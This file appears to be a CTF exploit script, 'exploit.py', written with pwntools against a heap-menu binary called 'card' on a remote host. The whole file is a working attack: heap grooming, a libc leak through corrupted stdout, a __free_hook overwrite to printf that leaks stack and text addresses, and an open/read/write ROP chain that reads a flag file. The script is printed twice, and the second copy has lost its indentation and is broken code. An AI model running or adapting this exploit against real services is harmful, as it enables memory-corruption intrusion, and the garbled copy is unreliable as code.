d4em0n/exploit.py

## exploit.py
from pwn import *

context.terminal = "tmux splitw -h -f".split()
#p = process("./card")
#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False)
#libc.off_leak = 3889536

#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"})
p = remote("45.77.72.122", 9777)
libc = ELF("./libc.so.6", checksec=False)
libc.off_leak = 2013568
libc.symbols['mov_r10_rdx_jmp_rax'] = 0x000000000007b0cb
libc.symbols['pop_rdi'] = 0x0000000000026b72
libc.symbols['pop_rsi'] = 0x0000000000027529
libc.symbols['pop_rdx_r12'] = 0x00000000001626d6
libc.symbols['pop_rax'] = 0x000000000004a550
libc.symbols['ret'] = 0x000000000004a551
libc.symbols['pop_r8_rbx_rbp_r12'] = 0x000000000014cb56
libc.symbols['syscall'] = 0x115cf4


def call_rop(func, rdi, rsi, rdx):
	rop = p64(libc.symbols['pop_rdi'])
	rop += p64(rdi)
	rop += p64(libc.symbols['pop_rsi'])
	rop += p64(rsi)
	rop += p64(libc.symbols['pop_rdx_r12'])
	rop += p64(rdx)
	rop += b"A"*8
	rop += p64(func)
	return rop

bssbuf = 0x4c60
cmd = """
x/gx &_IO_2_1_stdout_
"""
DEBUG = 0
if DEBUG:
        gdb.attach(p, cmd, gdb_args=["--init-eval-command='source ~/ctf/tools/gef/gef.py'"])

def goto(n):
	p.sendlineafter("Choice:", str(n))
	return

def new(sz):
	goto(1)
	p.sendlineafter("Size:", str(sz))

def edit(idx, cnt):
	goto(2)
	p.sendlineafter(":", str(idx))
	p.sendlineafter(":", cnt)

def drop(idx):
	goto(3)
	p.sendlineafter(":", str(idx))

def secret(idx, data):
	goto(5)
	p.sendlineafter(":", str(idx))
	p.sendafter(":", data)

new(0x38)
#a = int(input("off> "), 16)
a = 0xa
off = (a << 12) | 0x6a0
new(0x28)
new(0x18)
new(0x18)
new(0x28)
new(0x18)
new(0x370)
new(0x100)
new(0x28)
secret(7, p64(0)+p64(0x11)*(0x100//16))
edit(0, b"A"*0x28+p64(0x421))
edit(1, "B"*0x28)
#edit(2, "B"*0x28)
drop(2)
drop(8)
drop(4)
new(0x38)
new(0x38)
#edit(4, "A")
secret(4, p16(off))
new(0x28)
new(0x21)
pay = p64(0x00000000fbad1800)+p64(0)*3+b"\x00"
secret(9, pay)
p.recvuntil("\n")
p.recv(8)
leak = u64(p.recv(8))
print(hex(leak))
pause()
libc.address = leak - libc.off_leak
print(hex(libc.address))
new(0x18)
new(0x18)
new(0x18)
drop(12)
drop(11)
edit(0, b"A"*0x20+p64(libc.symbols['__free_hook']))
edit(10, "A"*0x18)
new(0x18)
new(0x18)
edit(12, p64(libc.symbols['printf']))
edit(11, "%p")
drop(11)
text = int(p.recvline(),16) - 6185
print(hex(text))
new(0x38)
edit(11, "%8$p")
drop(11)
stackaddr = int(p.recvline(),16) - 0x38
print(hex(stackaddr))
new(0x38)
edit(11, b"A"*8+p64(stackaddr))
edit(11, b"A"*6)
edit(11, b"A"*5)
edit(11, b"A"*4)
edit(11, p64(libc.symbols['gets']))
print(hex(libc.address+0x000000000009782b))
pause()
edit(12, p64(libc.address+0x000000000009782b))
edit(0, "flag\x00")
drop(11)
orw = call_rop(libc.symbols['open'], text+bssbuf, 0, 0)
orw += call_rop(libc.symbols['read'], 3, text+bssbuf, 0x100)
orw += call_rop(libc.symbols['write'], 1, text+bssbuf, 0x100)


p.sendline(orw)
p.interactive()
	from pwn import *

	context.terminal = "tmux splitw -h -f".split()
	#p = process("./card")
	#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False)
	#libc.off_leak = 3889536

	#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"})
	p = remote("45.77.72.122", 9777)
	libc = ELF("./libc.so.6", checksec=False)
	libc.off_leak = 2013568
	libc.symbols['mov_r10_rdx_jmp_rax'] = 0x000000000007b0cb
	libc.symbols['pop_rdi'] = 0x0000000000026b72
	libc.symbols['pop_rsi'] = 0x0000000000027529
	libc.symbols['pop_rdx_r12'] = 0x00000000001626d6
	libc.symbols['pop_rax'] = 0x000000000004a550
	libc.symbols['ret'] = 0x000000000004a551
	libc.symbols['pop_r8_rbx_rbp_r12'] = 0x000000000014cb56
	libc.symbols['syscall'] = 0x115cf4



	def call_rop(func, rdi, rsi, rdx):
	rop = p64(libc.symbols['pop_rdi'])
	rop += p64(rdi)
	rop += p64(libc.symbols['pop_rsi'])
	rop += p64(rsi)
	rop += p64(libc.symbols['pop_rdx_r12'])
	rop += p64(rdx)
	rop += b"A"*8
	rop += p64(func)
	return rop

	bssbuf = 0x4c60
	cmd = """
	x/gx &_IO_2_1_stdout_
	"""
	DEBUG = 0
	if DEBUG:
	gdb.attach(p, cmd, gdb_args=["--init-eval-command='source ~/ctf/tools/gef/gef.py'"])

	def goto(n):
	p.sendlineafter("Choice:", str(n))
	return

	def new(sz):
	goto(1)
	p.sendlineafter("Size:", str(sz))

	def edit(idx, cnt):
	goto(2)
	p.sendlineafter(":", str(idx))
	p.sendlineafter(":", cnt)

	def drop(idx):
	goto(3)
	p.sendlineafter(":", str(idx))

	def secret(idx, data):
	goto(5)
	p.sendlineafter(":", str(idx))
	p.sendafter(":", data)

	new(0x38)
	#a = int(input("off> "), 16)
	a = 0xa
	off = (a << 12) \| 0x6a0
	new(0x28)
	new(0x18)
	new(0x18)
	new(0x28)
	new(0x18)
	new(0x370)
	new(0x100)
	new(0x28)
	secret(7, p64(0)+p64(0x11)*(0x100//16))
	edit(0, b"A"*0x28+p64(0x421))
	edit(1, "B"*0x28)
	#edit(2, "B"*0x28)
	drop(2)
	drop(8)
	drop(4)
	new(0x38)
	new(0x38)
	#edit(4, "A")
	secret(4, p16(off))
	new(0x28)
	new(0x21)
	pay = p64(0x00000000fbad1800)+p64(0)*3+b"\x00"
	secret(9, pay)
	p.recvuntil("\n")
	p.recv(8)
	leak = u64(p.recv(8))
	print(hex(leak))
	pause()
	libc.address = leak - libc.off_leak
	print(hex(libc.address))
	new(0x18)
	new(0x18)
	new(0x18)
	drop(12)
	drop(11)
	edit(0, b"A"*0x20+p64(libc.symbols['__free_hook']))
	edit(10, "A"*0x18)
	new(0x18)
	new(0x18)
	edit(12, p64(libc.symbols['printf']))
	edit(11, "%p")
	drop(11)
	text = int(p.recvline(),16) - 6185
	print(hex(text))
	new(0x38)
	edit(11, "%8$p")
	drop(11)
	stackaddr = int(p.recvline(),16) - 0x38
	print(hex(stackaddr))
	new(0x38)
	edit(11, b"A"*8+p64(stackaddr))
	edit(11, b"A"*6)
	edit(11, b"A"*5)
	edit(11, b"A"*4)
	edit(11, p64(libc.symbols['gets']))
	print(hex(libc.address+0x000000000009782b))
	pause()
	edit(12, p64(libc.address+0x000000000009782b))
	edit(0, "flag\x00")
	drop(11)
	orw = call_rop(libc.symbols['open'], text+bssbuf, 0, 0)
	orw += call_rop(libc.symbols['read'], 3, text+bssbuf, 0x100)
	orw += call_rop(libc.symbols['write'], 1, text+bssbuf, 0x100)


	p.sendline(orw)
	p.interactive()